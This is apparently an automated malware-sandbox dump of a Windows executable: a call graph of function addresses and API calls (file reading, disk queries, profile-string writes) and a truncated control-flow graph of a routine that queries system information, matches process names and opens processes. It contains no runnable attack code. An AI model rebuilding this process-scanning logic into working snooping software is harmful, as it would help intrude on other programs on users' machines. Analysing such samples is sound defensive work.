40175 441b3f 40185 43a9f6 40175->40185 40177 441b61 40358 4386af memset 40177->40358 40179 44189a 40180 442bd4 40179->40180 40181 4418e2 40179->40181 40182 4418ea 40180->40182 40360 441409 memset 40180->40360 40181->40182 40359 4414a9 12 API calls 40181->40359 40186 43aa20 40185->40186 40187 43aadf 40185->40187 40186->40187 40188 43aa34 memset 40186->40188 40187->40177 40189 43aa56 40188->40189 40190 43aa4d 40188->40190 40361 43a6e7 40189->40361 40369 42c02e memset 40190->40369 40195 43aad3 40371 4169a7 11 API calls 40195->40371 40196 43aaae 40196->40187 40196->40195 40211 43aae5 40196->40211 40197 43ac18 40200 43ac47 40197->40200 40373 42bbd5 memcpy memcpy memcpy memset memcpy 40197->40373 40201 43aca8 40200->40201 40374 438eed 16 API calls 40200->40374 40204 43acd5 40201->40204 40376 4233ae 11 API calls 40201->40376 40377 423426 11 API calls 40204->40377 40205 43ac87 40375 4233c5 16 API calls 40205->40375 40209 43ace1 40378 439811 163 API calls 40209->40378 40210 43a9f6 161 API calls 40210->40211 40211->40187 40211->40197 40211->40210 40372 439bbb 22 API calls 40211->40372 40213 43acfd 40218 43ad2c 40213->40218 40379 438eed 16 API calls 40213->40379 40215 43ad19 40380 4233c5 16 API calls 40215->40380 40216 43ad58 40381 44081d 163 API calls 40216->40381 40218->40216 40222 43add9 40218->40222 40221 43ae3a memset 40223 43ae73 40221->40223 40222->40222 40385 423426 11 API calls 40222->40385 40386 42e1c0 147 API calls 40223->40386 40224 43adab 40383 438c4e 163 API calls 40224->40383 40227 43ad6c 40227->40187 40227->40224 40382 42370b memset memcpy memset 40227->40382 40229 43adcc 40384 440f84 12 API calls 40229->40384 40230 43ae96 40387 42e1c0 147 API calls 40230->40387 40233 43aea8 40234 43aec1 40233->40234 40388 42e199 147 API calls 40233->40388 40235 43af00 40234->40235 40389 42e1c0 147 API calls 40234->40389 40235->40187 40239 43af1a 40235->40239 40240 43b3d9 40235->40240 40390 438eed 16 API calls 40239->40390 40245 43b3f6 40240->40245 40249 43b4c8 40240->40249 40242 43b60f 40242->40187 40449 4393a5 17 API calls 40242->40449 40244 43af2f 40391 4233c5 16 API calls 40244->40391 40431 432878 12 API calls 40245->40431 40247 43af51 40392 423426 11 API calls 40247->40392 40257 43b4f2 40249->40257 40437 42bbd5 memcpy memcpy memcpy memset memcpy 40249->40437 40251 43af7d 40393 423426 11 API calls 40251->40393 40255 43b529 40439 44081d 163 API calls 40255->40439 40256 43af94 40394 423330 11 API calls 40256->40394 40438 43a76c 21 API calls 40257->40438 40261 43afca 40395 423330 11 API calls 40261->40395 40262 43b47e 40265 43b497 40262->40265 40434 42374a memcpy memset memcpy memcpy memcpy 40262->40434 40263 43b544 40266 43b55c 40263->40266 40440 42c02e memset 40263->40440 40435 4233ae 11 API calls 40265->40435 40441 43a87a 163 API calls 40266->40441 40267 43afdb 40396 4233ae 11 API calls 40267->40396 40272 43b428 40283 43b462 40272->40283 40432 432b60 16 API calls 40272->40432 40274 43b56c 40277 43b58a 40274->40277 40442 423330 11 API calls 40274->40442 40275 43b4b1 40436 423399 11 API calls 40275->40436 40276 43afee 40397 44081d 163 API calls 40276->40397 40443 440f84 12 API calls 40277->40443 40279 43b4c1 40445 42db80 163 API calls 40279->40445 40433 423330 11 API calls 40283->40433 40285 43b592 40444 43a82f 16 API calls 40285->40444 40288 43b5b4 40446 438c4e 163 API calls 40288->40446 40290 43b5cf 40447 42c02e memset 40290->40447 40292 43b005 40292->40187 40296 43b01f 40292->40296 40398 42d836 163 API calls 40292->40398 40293 43b1ef 40408 4233c5 16 API calls 40293->40408 40296->40293 40406 423330 11 API calls 40296->40406 40407 42d71d 163 API calls 40296->40407 40297 43b212 40409 423330 11 API calls 40297->40409 40298 43b087 40399 4233ae 11 API calls 40298->40399 40299 43add4 40299->40242 40448 438f86 16 API calls 40299->40448 40303 43b22a 40410 42ccb5 11 API calls 40303->40410 40306 43b23f 40411 4233ae 11 API calls 40306->40411 40307 43b10f 40402 423330 11 API calls 40307->40402 40309 43b257 40412 4233ae 11 API calls 40309->40412 40313 43b129 40403 4233ae 11 API calls 40313->40403 40314 43b26e 40413 4233ae 11 API calls 40314->40413 40317 43b09a 40317->40307 40400 42cc15 19 API calls 40317->40400 40401 4233ae 11 API calls 40317->40401 40318 43b282 40414 43a87a 163 API calls 40318->40414 40320 43b13c 40404 440f84 12 API calls 40320->40404 40322 43b29d 40415 423330 11 API calls 40322->40415 40325 43b15f 40405 4233ae 11 API calls 40325->40405 40326 43b2af 40328 43b2b8 40326->40328 40329 43b2ce 40326->40329 40416 4233ae 11 API calls 40328->40416 40417 440f84 12 API calls 40329->40417 40332 43b2c9 40419 4233ae 11 API calls 40332->40419 40333 43b2da 40418 42370b memset memcpy memset 40333->40418 40336 43b2f9 40420 423330 11 API calls 40336->40420 40338 43b30b 40421 423330 11 API calls 40338->40421 40340 43b325 40422 423399 11 API calls 40340->40422 40342 43b332 40423 4233ae 11 API calls 40342->40423 40344 43b354 40424 423399 11 API calls 40344->40424 40346 43b364 40425 43a82f 16 API calls 40346->40425 40348 43b370 40426 42db80 163 API calls 40348->40426 40350 43b380 40427 438c4e 163 API calls 40350->40427 40352 43b39e 40428 423399 11 API calls 40352->40428 40354 43b3ae 40429 43a76c 21 API calls 40354->40429 40356 43b3c3 40430 423399 11 API calls 40356->40430 40358->40179 40359->40182 40360->40180 40362 43a6f5 40361->40362 40368 43a765 40361->40368 40362->40368 40450 42a115 40362->40450 40366 43a73d 40367 42a115 147 API calls 40366->40367 40366->40368 40367->40368 40368->40187 40370 4397fd memset 40368->40370 40369->40189 40370->40196 40371->40187 40372->40211 40373->40200 40374->40205 40375->40201 40376->40204 40377->40209 40378->40213 40379->40215 40380->40218 40381->40227 40382->40224 40383->40229 40384->40299 40385->40221 40386->40230 40387->40233 40388->40234 40389->40234 40390->40244 40391->40247 40392->40251 40393->40256 40394->40261 40395->40267 40396->40276 40397->40292 40398->40298 40399->40317 40400->40317 40401->40317 40402->40313 40403->40320 40404->40325 40405->40296 40406->40296 40407->40296 40408->40297 40409->40303 40410->40306 40411->40309 40412->40314 40413->40318 40414->40322 40415->40326 40416->40332 40417->40333 40418->40332 40419->40336 40420->40338 40421->40340 40422->40342 40423->40344 40424->40346 40425->40348 40426->40350 40427->40352 40428->40354 40429->40356 40430->40299 40431->40272 40432->40283 40433->40262 40434->40265 40435->40275 40436->40279 40437->40257 40438->40255 40439->40263 40440->40266 40441->40274 40442->40277 40443->40285 40444->40279 40445->40288 40446->40290 40447->40299 40448->40242 40449->40187 40451 42a175 40450->40451 40453 42a122 40450->40453 40451->40368 40456 42b13b 147 API calls 40451->40456 40453->40451 40454 42a115 147 API calls 40453->40454 40457 43a174 40453->40457 40481 42a0a8 147 API calls 40453->40481 40454->40453 40456->40366 40471 43a196 40457->40471 40472 43a19e 40457->40472 40458 43a306 40458->40471 40494 4388c4 14 API calls 40458->40494 40461 42a115 147 API calls 40461->40472 40462 415a91 memset 40462->40472 40463 43a642 40463->40471 40498 4169a7 11 API calls 40463->40498 40465 4165ff 11 API calls 40465->40472 40467 43a635 40497 42c02e memset 40467->40497 40471->40453 40472->40458 40472->40461 40472->40462 40472->40465 40472->40471 40482 42ff8c 40472->40482 40490 439504 13 API calls 40472->40490 40491 4312d0 147 API calls 40472->40491 40492 42be4c memcpy memcpy memcpy memset memcpy 40472->40492 40493 43a121 11 API calls 40472->40493 40474 4169a7 11 API calls 40475 43a325 40474->40475 40475->40463 40475->40467 40475->40471 40475->40474 40476 42b5b5 memset memcpy 40475->40476 40477 42bf4c 14 API calls 40475->40477 40480 4165ff 11 API calls 40475->40480 40495 42b63e 14 API calls 40475->40495 40496 42bfcf memcpy 40475->40496 40476->40475 40477->40475 40480->40475 40481->40453 40483 43817e 139 API calls 40482->40483 40484 42ff99 40483->40484 40485 42ffe3 40484->40485 40486 42ffd0 40484->40486 40489 42ff9d 40484->40489 40500 4169a7 11 API calls 40485->40500 40499 4169a7 11 API calls 40486->40499 40489->40472 40490->40472 40491->40472 40492->40472 40493->40472 40494->40475 40495->40475 40496->40475 40497->40463 40498->40471 40499->40489 40500->40489 40527 41493c EnumResourceNamesW 37541 4287c1 37542 4287d2 37541->37542 37543 429ac1 37541->37543 37544 428818 37542->37544 37545 42881f 37542->37545 37559 425711 37542->37559 37558 425ad6 37543->37558 37611 415c56 11 API calls 37543->37611 37578 42013a 37544->37578 37606 420244 97 API calls 37545->37606 37550 4260dd 37605 424251 120 API calls 37550->37605 37552 4259da 37604 416760 11 API calls 37552->37604 37557 429a4d 37561 429a66 37557->37561 37562 429a9b 37557->37562 37559->37543 37559->37552 37559->37557 37560 422aeb memset memcpy memcpy 37559->37560 37564 4260a1 37559->37564 37574 4259c2 37559->37574 37577 425a38 37559->37577 37594 4227f0 memset memcpy 37559->37594 37595 422b84 15 API calls 37559->37595 37596 422b5d memset memcpy memcpy 37559->37596 37597 422640 13 API calls 37559->37597 37599 4241fc 11 API calls 37559->37599 37600 42413a 90 API calls 37559->37600 37560->37559 37607 415c56 11 API calls 37561->37607 37566 429a96 37562->37566 37609 416760 11 API calls 37562->37609 37603 415c56 11 API calls 37564->37603 37610 424251 120 API calls 37566->37610 37569 429a7a 37608 416760 11 API calls 37569->37608 37574->37558 37598 415c56 11 API calls 37574->37598 37577->37574 37601 422640 13 API calls 37577->37601 37602 4226e0 12 API calls 37577->37602 37579 42014c 37578->37579 37582 420151 37578->37582 37621 41e466 97 API calls 37579->37621 37581 420162 37581->37559 37582->37581 37583 4201b3 37582->37583 37584 420229 37582->37584 37585 4201b8 37583->37585 37586 4201dc 37583->37586 37584->37581 37587 41fd5e 86 API calls 37584->37587 37612 41fbdb 37585->37612 37586->37581 37590 4201ff 37586->37590 37618 41fc4c 37586->37618 37587->37581 37590->37581 37593 42013a 97 API calls 37590->37593 37593->37581 37594->37559 37595->37559 37596->37559 37597->37559 37598->37552 37599->37559 37600->37559 37601->37577 37602->37577 37603->37552 37604->37550 37605->37558 37606->37559 37607->37569 37608->37566 37609->37566 37610->37543 37611->37552 37613 41fbf8 37612->37613 37616 41fbf1 37612->37616 37626 41ee26 37613->37626 37617 41fc39 37616->37617 37636 4446ce 11 API calls 37616->37636 37617->37581 37622 41fd5e 37617->37622 37619 41ee6b 86 API calls 37618->37619 37620 41fc5d 37619->37620 37620->37586 37621->37582 37624 41fd65 37622->37624 37623 41fdab 37623->37581 37624->37623 37625 41fbdb 86 API calls 37624->37625 37625->37624 37627 41ee41 37626->37627 37628 41ee32 37626->37628 37637 41edad 37627->37637 37640 4446ce 11 API calls 37628->37640 37631 41ee3c 37631->37616 37634 41ee58 37634->37631 37642 41ee6b 37634->37642 37636->37617 37646 41be52 37637->37646 37640->37631 37641 41eb85 11 API calls 37641->37634 37643 41ee70 37642->37643 37644 41ee78 37642->37644 37702 41bf99 86 API calls 37643->37702 37644->37631 37647 41be6f 37646->37647 37648 41be5f 37646->37648 37653 41be8c 37647->37653 37667 418c63 37647->37667 37681 4446ce 11 API calls 37648->37681 37651 41be69 37651->37631 37651->37641 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37658 41bee7 37653->37658 37684 4446ce 11 API calls 37654->37684 37657 41bef0 37655->37657 37661 41bee2 37655->37661 37657->37658 37659 41bf01 37657->37659 37658->37651 37685 41a453 86 API calls 37658->37685 37660 41bf24 memset 37659->37660 37665 41bf14 37659->37665 37682 418a6d memset memcpy memset 37659->37682 37660->37651 37671 41ac13 37661->37671 37683 41a223 memset memcpy memset 37665->37683 37666 41bf20 37666->37660 37670 418c72 37667->37670 37668 418c94 37668->37653 37669 418d51 memset memset 37669->37668 37670->37668 37670->37669 37672 41ac52 37671->37672 37673 41ac3f memset 37671->37673 37675 41ac6a 37672->37675 37686 41dc14 19 API calls 37672->37686 37678 41acd9 37673->37678 37677 41aca1 37675->37677 37687 41519d 37675->37687 37677->37678 37679 41acc0 memset 37677->37679 37680 41accd memcpy 37677->37680 37678->37658 37679->37678 37680->37678 37681->37651 37682->37665 37683->37666 37684->37658 37686->37675 37690 4175ed 37687->37690 37698 417570 SetFilePointer 37690->37698 37693 41760a ReadFile 37694 417637 37693->37694 37695 417627 GetLastError 37693->37695 37696 41763e memset 37694->37696 37697 4151b3 37694->37697 37695->37697 37696->37697 37697->37677 37699 4175b2 37698->37699 37700 41759c GetLastError 37698->37700 37699->37693 37699->37697 37700->37699 37701 4175a8 GetLastError 37700->37701 37701->37699 37702->37644 37703 417bc5 37704 417c61 37703->37704 37705 417bda 37703->37705 37705->37704 37706 417bf6 UnmapViewOfFile CloseHandle 37705->37706 37708 417c2c 37705->37708 37710 4175b7 37705->37710 37706->37705 37706->37706 37708->37705 37715 41851e 20 API calls 37708->37715 37711 4175d6 CloseHandle 37710->37711 37712 4175c8 37711->37712 37713 4175df 37711->37713 37712->37713 37714 4175ce Sleep 37712->37714 37713->37705 37714->37711 37715->37708 37722 4415ea 37730 4304b2 37722->37730 37724 4415fe 37725 4418ea 37724->37725 37726 442bd4 37724->37726 37727 4418e2 37724->37727 37726->37725 37778 441409 memset 37726->37778 37727->37725 37777 4414a9 12 API calls 37727->37777 37779 43041c 12 API calls 37730->37779 37732 4304cd 37737 430557 37732->37737 37780 43034a 37732->37780 37734 4304f3 37734->37737 37784 430468 11 API calls 37734->37784 37736 430506 37736->37737 37738 43057b 37736->37738 37785 43817e 37736->37785 37737->37724 37790 415a91 37738->37790 37743 4305e4 37743->37737 37795 4328e4 12 API calls 37743->37795 37745 43052d 37745->37737 37745->37738 37748 430542 37745->37748 37747 4305fa 37749 430609 37747->37749 37796 423383 11 API calls 37747->37796 37748->37737 37789 4169a7 11 API calls 37748->37789 37797 423330 11 API calls 37749->37797 37752 430634 37798 423399 11 API calls 37752->37798 37754 430648 37799 4233ae 11 API calls 37754->37799 37756 43066b 37800 423330 11 API calls 37756->37800 37758 43067d 37801 4233ae 11 API calls 37758->37801 37760 430695 37802 423330 11 API calls 37760->37802 37762 4306d6 37804 423330 11 API calls 37762->37804 37763 4306a7 37763->37762 37764 4306c0 37763->37764 37803 4233ae 11 API calls 37764->37803 37767 4306d1 37805 430369 17 API calls 37767->37805 37769 4306f3 37806 423330 11 API calls 37769->37806 37771 430704 37807 423330 11 API calls 37771->37807 37773 430710 37808 423330 11 API calls 37773->37808 37775 43071e 37809 423383 11 API calls 37775->37809 37777->37725 37778->37726 37779->37732 37781 43034e 37780->37781 37783 430359 37780->37783 37810 415c23 memcpy 37781->37810 37783->37734 37784->37736 37786 438187 37785->37786 37788 438192 37785->37788 37811 4380f6 37786->37811 37788->37745 37789->37737 37791 415a9d 37790->37791 37792 415ab3 37791->37792 37793 415aa4 memset 37791->37793 37792->37737 37794 4397fd memset 37792->37794 37793->37792 37794->37743 37795->37747 37796->37749 37797->37752 37798->37754 37799->37756 37800->37758 37801->37760 37802->37763 37803->37767 37804->37767 37805->37769 37806->37771 37807->37773 37808->37775 37809->37737 37810->37783 37813 43811f 37811->37813 37812 438164 37812->37788 37813->37812 37816 437e5e 37813->37816 37839 4300e8 memset memset memcpy 37813->37839 37840 437d3c 37816->37840 37818 437eb3 37818->37813 37819 437ea9 37819->37818 37824 437f22 37819->37824 37855 41f432 37819->37855 37822 437f06 37905 415c56 11 API calls 37822->37905 37826 437f7f 37824->37826 37906 432d4e 37824->37906 37825 437f95 37910 415c56 11 API calls 37825->37910 37826->37825 37828 43802b 37826->37828 37866 4165ff 37828->37866 37830 437fa3 37830->37818 37913 41f638 104 API calls 37830->37913 37835 43806b 37836 438094 37835->37836 37911 42f50e 138 API calls 37835->37911 37836->37830 37912 4300e8 memset memset memcpy 37836->37912 37839->37813 37841 437d69 37840->37841 37844 437d80 37840->37844 37926 437ccb 11 API calls 37841->37926 37843 437d76 37843->37819 37844->37843 37845 437da3 37844->37845 37847 437d90 37844->37847 37914 438460 37845->37914 37847->37843 37930 437ccb 11 API calls 37847->37930 37849 437de8 37929 424f26 123 API calls 37849->37929 37851 437dcb 37851->37849 37927 444283 13 API calls 37851->37927 37853 437dfc 37928 437ccb 11 API calls 37853->37928 37856 41f54d 37855->37856 37860 41f44f 37855->37860 37857 41f466 37856->37857 38101 41c635 memset memset 37856->38101 37857->37822 37857->37824 37860->37857 37864 41f50b 37860->37864 38072 41f1a5 37860->38072 38097 41c06f memcmp 37860->38097 38098 41f3b1 90 API calls 37860->38098 38099 41f398 86 API calls 37860->38099 37864->37856 37864->37857 38100 41c295 86 API calls 37864->38100 37867 4165a0 11 API calls 37866->37867 37868 41660d 37867->37868 37869 437371 37868->37869 37870 41703f 11 API calls 37869->37870 37871 437399 37870->37871 37872 43739d 37871->37872 37874 4373ac 37871->37874 38206 4446ea 11 API calls 37872->38206 37875 416935 16 API calls 37874->37875 37891 4373ca 37875->37891 37876 437584 37878 4375bc 37876->37878 38213 42453e 123 API calls 37876->38213 37877 438460 134 API calls 37877->37891 37880 415c7d 16 API calls 37878->37880 37881 4375d2 37880->37881 37885 4373a7 37881->37885 38214 4442e6 37881->38214 37884 4375e2 37884->37885 38221 444283 13 API calls 37884->38221 37885->37835 37887 415a91 memset 37887->37891 37890 43758f 38212 42453e 123 API calls 37890->38212 37891->37876 37891->37877 37891->37887 37891->37890 37904 437d3c 135 API calls 37891->37904 38188 4251c4 37891->38188 38207 425433 13 API calls 37891->38207 38208 425413 17 API calls 37891->38208 38209 42533e 16 API calls 37891->38209 38210 42538f 16 API calls 37891->38210 38211 42453e 123 API calls 37891->38211 37894 4375f4 37898 437620 37894->37898 37899 43760b 37894->37899 37896 43759f 37897 416935 16 API calls 37896->37897 37897->37876 37900 416935 16 API calls 37898->37900 38222 444283 13 API calls 37899->38222 37900->37885 37903 437612 memcpy 37903->37885 37904->37891 37905->37818 37907 432d58 37906->37907 37909 432d65 37906->37909 38297 432cc4 memset memset memcpy 37907->38297 37909->37826 37910->37830 37911->37836 37912->37830 37913->37818 37931 41703f 37914->37931 37916 43847a 37917 43848a 37916->37917 37918 43847e 37916->37918 37938 438270 37917->37938 37968 4446ea 11 API calls 37918->37968 37922 438488 37922->37851 37924 4384bb 37925 438270 134 API calls 37924->37925 37925->37922 37926->37843 37927->37853 37928->37849 37929->37843 37930->37843 37932 417044 37931->37932 37933 41705c 37931->37933 37937 417055 37932->37937 37970 416760 11 API calls 37932->37970 37934 417075 37933->37934 37971 41707a 11 API calls 37933->37971 37934->37916 37937->37916 37939 415a91 memset 37938->37939 37940 43828d 37939->37940 37941 438297 37940->37941 37942 438341 37940->37942 37944 4382d6 37940->37944 37943 415c7d 16 API calls 37941->37943 37972 44358f 37942->37972 37946 438458 37943->37946 37947 4382fb 37944->37947 37948 4382db 37944->37948 37946->37922 37969 424f26 123 API calls 37946->37969 38015 415c23 memcpy 37947->38015 38003 416935 37948->38003 37951 438305 37955 44358f 19 API calls 37951->37955 37957 438318 37951->37957 37952 4382e9 38011 415c7d 37952->38011 37954 438373 37960 438383 37954->37960 38016 4300e8 memset memset memcpy 37954->38016 37955->37957 37957->37954 37998 43819e 37957->37998 37959 4383cd 37961 4383f5 37959->37961 38018 42453e 123 API calls 37959->38018 37960->37959 38017 415c23 memcpy 37960->38017 37964 438404 37961->37964 37965 43841c 37961->37965 37967 416935 16 API calls 37964->37967 37966 416935 16 API calls 37965->37966 37966->37941 37967->37941 37968->37922 37969->37924 37970->37937 37971->37932 37973 4435be 37972->37973 37974 44360c 37973->37974 37976 443676 37973->37976 37979 4436ce 37973->37979 37983 44366c 37973->37983 38019 442ff8 37973->38019 37974->37957 37975 443758 37988 443775 37975->37988 38028 441409 memset 37975->38028 37976->37975 37978 443737 37976->37978 37980 442ff8 19 API calls 37976->37980 37981 442ff8 19 API calls 37978->37981 37985 4165ff 11 API calls 37979->37985 37980->37978 37981->37975 38027 4169a7 11 API calls 37983->38027 37984 4437be 37989 4437de 37984->37989 38030 416760 11 API calls 37984->38030 37985->37976 37988->37984 38029 415c56 11 API calls 37988->38029 37992 443801 37989->37992 38031 42463b memset memcpy 37989->38031 37991 443826 38033 43bd08 memset 37991->38033 37992->37991 38032 43024d memset 37992->38032 37996 443837 37996->37974 38034 43024d memset 37996->38034 37999 438246 37998->37999 38001 4381ba 37998->38001 37999->37954 38000 41f432 110 API calls 38000->38001 38001->37999 38001->38000 38050 41f638 104 API calls 38001->38050 38004 41693e 38003->38004 38007 41698e 38003->38007 38005 41694c 38004->38005 38051 422fd1 memset 38004->38051 38005->38007 38052 4165a0 38005->38052 38007->37952 38012 415c81 38011->38012 38013 415c9c 38011->38013 38012->38013 38014 416935 16 API calls 38012->38014 38013->37941 38014->38013 38015->37951 38016->37960 38017->37959 38018->37961 38020 442ffe 38019->38020 38021 443094 38020->38021 38023 443092 38020->38023 38035 4414ff 38020->38035 38047 4169a7 11 API calls 38020->38047 38048 441325 memset 38020->38048 38049 4414a9 12 API calls 38021->38049 38023->37973 38027->37976 38028->37975 38029->37984 38030->37989 38031->37992 38032->37991 38033->37996 38034->37996 38036 441539 38035->38036 38037 441547 38035->38037 38036->38037 38038 441575 38036->38038 38039 441582 38036->38039 38040 4418e2 38037->38040 38046 442bd4 38037->38046 38042 42fccf 18 API calls 38038->38042 38041 43275a 12 API calls 38039->38041 38043 4414a9 12 API calls 38040->38043 38044 4418ea 38040->38044 38041->38037 38042->38037 38043->38044 38044->38020 38045 441409 memset 38045->38046 38046->38044 38046->38045 38047->38020 38048->38020 38049->38023 38050->38001 38051->38005 38058 415cfe 38052->38058 38057 422b84 15 API calls 38057->38007 38059 41628e 38058->38059 38064 415d23 __aullrem __aulldvrm 38058->38064 38066 416520 38059->38066 38060 4163ca 38061 416422 10 API calls 38060->38061 38061->38059 38062 416422 10 API calls 38062->38064 38063 416172 memset 38063->38064 38064->38059 38064->38060 38064->38062 38064->38063 38065 415cb9 10 API calls 38064->38065 38065->38064 38067 416527 38066->38067 38071 416574 38066->38071 38068 415700 10 API calls 38067->38068 38069 416544 38067->38069 38067->38071 38068->38069 38070 416561 memcpy 38069->38070 38069->38071 38070->38071 38071->38007 38071->38057 38102 41bc3b 38072->38102 38075 41edad 86 API calls 38076 41f1cb 38075->38076 38077 41f1f5 memcmp 38076->38077 38078 41f20e 38076->38078 38082 41f282 38076->38082 38077->38078 38079 41f21b memcmp 38078->38079 38078->38082 38080 41f326 38079->38080 38083 41f23d 38079->38083 38081 41ee6b 86 API calls 38080->38081 38080->38082 38081->38082 38082->37860 38083->38080 38084 41f28e memcmp 38083->38084 38126 41c8df 56 API calls 38083->38126 38084->38080 38085 41f2a9 38084->38085 38085->38080 38088 41f308 38085->38088 38089 41f2d8 38085->38089 38087 41f269 38087->38080 38090 41f287 38087->38090 38091 41f27a 38087->38091 38088->38080 38128 4446ce 11 API calls 38088->38128 38092 41ee6b 86 API calls 38089->38092 38090->38084 38093 41ee6b 86 API calls 38091->38093 38094 41f2e0 38092->38094 38093->38082 38127 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38094->38127 38097->37860 38098->37860 38099->37860 38100->37856 38101->37857 38104 41bc54 38102->38104 38111 41be0b 38102->38111 38107 41bd61 38104->38107 38104->38111 38119 41bc8d 38104->38119 38129 41baf0 55 API calls 38104->38129 38106 41be45 38106->38075 38106->38082 38107->38106 38138 41a25f memset 38107->38138 38109 41be04 38136 41aee4 56 API calls 38109->38136 38111->38107 38137 41ae17 34 API calls 38111->38137 38112 41bd42 38112->38107 38112->38109 38113 41bdd8 memset 38112->38113 38114 41bdba 38112->38114 38115 41bde7 memcmp 38113->38115 38125 4175ed 6 API calls 38114->38125 38115->38109 38118 41bdfd 38115->38118 38116 41bd18 38116->38107 38116->38112 38134 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38116->38134 38117 41bdcc 38117->38107 38117->38115 38135 41a1b0 memset 38118->38135 38119->38107 38119->38112 38119->38116 38130 4151e3 38119->38130 38125->38117 38126->38087 38127->38082 38128->38080 38129->38119 38139 41837f 38130->38139 38133 444706 11 API calls 38133->38116 38134->38112 38135->38109 38136->38111 38137->38107 38138->38106 38140 4183c1 38139->38140 38143 4183ca 38139->38143 38186 418197 25 API calls 38140->38186 38144 4151f9 38143->38144 38160 418160 38143->38160 38144->38116 38144->38133 38145 4183e5 38145->38144 38169 41739b 38145->38169 38148 418444 CreateFileW 38150 418477 38148->38150 38149 41845f CreateFileA 38149->38150 38151 4184c2 memset 38150->38151 38152 41847e GetLastError free 38150->38152 38172 418758 38151->38172 38153 4184b5 38152->38153 38154 418497 38152->38154 38187 444706 11 API calls 38153->38187 38156 41837f 49 API calls 38154->38156 38156->38144 38161 41739b GetVersionExW 38160->38161 38162 418165 38161->38162 38164 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38162->38164 38165 418178 38164->38165 38166 41817f 38165->38166 38167 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38165->38167 38166->38145 38168 418188 free 38167->38168 38168->38145 38170 4173d6 38169->38170 38171 4173ad GetVersionExW 38169->38171 38170->38148 38170->38149 38171->38170 38173 418680 43 API calls 38172->38173 38174 418782 38173->38174 38175 418160 11 API calls 38174->38175 38177 418506 free 38174->38177 38176 418799 38175->38176 38176->38177 38178 41739b GetVersionExW 38176->38178 38177->38144 38179 4187a7 38178->38179 38180 4187da 38179->38180 38181 4187ad GetDiskFreeSpaceW 38179->38181 38183 4187ec GetDiskFreeSpaceA 38180->38183 38185 4187e8 38180->38185 38184 418800 free 38181->38184 38183->38184 38184->38177 38185->38183 38186->38143 38187->38144 38223 424f07 38188->38223 38190 4251e4 38191 4251f7 38190->38191 38192 4251e8 38190->38192 38231 4250f8 38191->38231 38230 4446ea 11 API calls 38192->38230 38194 4251f2 38194->37891 38196 425209 38199 425249 38196->38199 38202 4250f8 127 API calls 38196->38202 38203 425287 38196->38203 38239 4384e9 135 API calls 38196->38239 38240 424f74 124 API calls 38196->38240 38197 415c7d 16 API calls 38197->38194 38199->38203 38241 424ff0 13 API calls 38199->38241 38202->38196 38203->38197 38204 425266 38204->38203 38242 415be9 memcpy 38204->38242 38206->37885 38207->37891 38208->37891 38209->37891 38210->37891 38211->37891 38212->37896 38213->37878 38215 4442eb 38214->38215 38218 444303 38214->38218 38295 41707a 11 API calls 38215->38295 38217 4442f2 38217->38218 38296 4446ea 11 API calls 38217->38296 38218->37884 38220 444300 38220->37884 38221->37894 38222->37903 38224 424f1f 38223->38224 38225 424f0c 38223->38225 38244 424eea 11 API calls 38224->38244 38243 416760 11 API calls 38225->38243 38228 424f18 38228->38190 38229 424f24 38229->38190 38230->38194 38232 425108 38231->38232 38238 42510d 38231->38238 38277 424f74 124 API calls 38232->38277 38235 42516e 38237 415c7d 16 API calls 38235->38237 38236 425115 38236->38196 38237->38236 38238->38236 38245 42569b 38238->38245 38239->38196 38240->38196 38241->38204 38242->38203 38243->38228 38244->38229 38255 4256f1 38245->38255 38273 4259c2 38245->38273 38250 4260dd 38289 424251 120 API calls 38250->38289 38254 429a4d 38257 429a66 38254->38257 38258 429a9b 38254->38258 38255->38254 38256 422aeb memset memcpy memcpy 38255->38256 38260 4260a1 38255->38260 38269 4259da 38255->38269 38271 429ac1 38255->38271 38255->38273 38276 425a38 38255->38276 38278 4227f0 memset memcpy 38255->38278 38279 422b84 15 API calls 38255->38279 38280 422b5d memset memcpy memcpy 38255->38280 38281 422640 13 API calls 38255->38281 38283 4241fc 11 API calls 38255->38283 38284 42413a 90 API calls 38255->38284 38256->38255 38290 415c56 11 API calls 38257->38290 38262 429a96 38258->38262 38292 416760 11 API calls 38258->38292 38287 415c56 11 API calls 38260->38287 38293 424251 120 API calls 38262->38293 38265 429a7a 38291 416760 11 API calls 38265->38291 38288 416760 11 API calls 38269->38288 38272 425ad6 38271->38272 38294 415c56 11 API calls 38271->38294 38272->38235 38273->38272 38282 415c56 11 API calls 38273->38282 38276->38273 38285 422640 13 API calls 38276->38285 38286 4226e0 12 API calls 38276->38286 38277->38238 38278->38255 38279->38255 38280->38255 38281->38255 38282->38269 38283->38255 38284->38255 38285->38276 38286->38276 38287->38269 38288->38250 38289->38272 38290->38265 38291->38262 38292->38262 38293->38271 38294->38269 38295->38217 38296->38220 38297->37909 40161 4147f3 40164 414561 40161->40164 40163 414813 40165 41456d 40164->40165 40166 41457f GetPrivateProfileIntW 40164->40166 40169 4143f1 memset _itow WritePrivateProfileStringW 40165->40169 40166->40163 40168 41457a 40168->40163 40169->40168

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 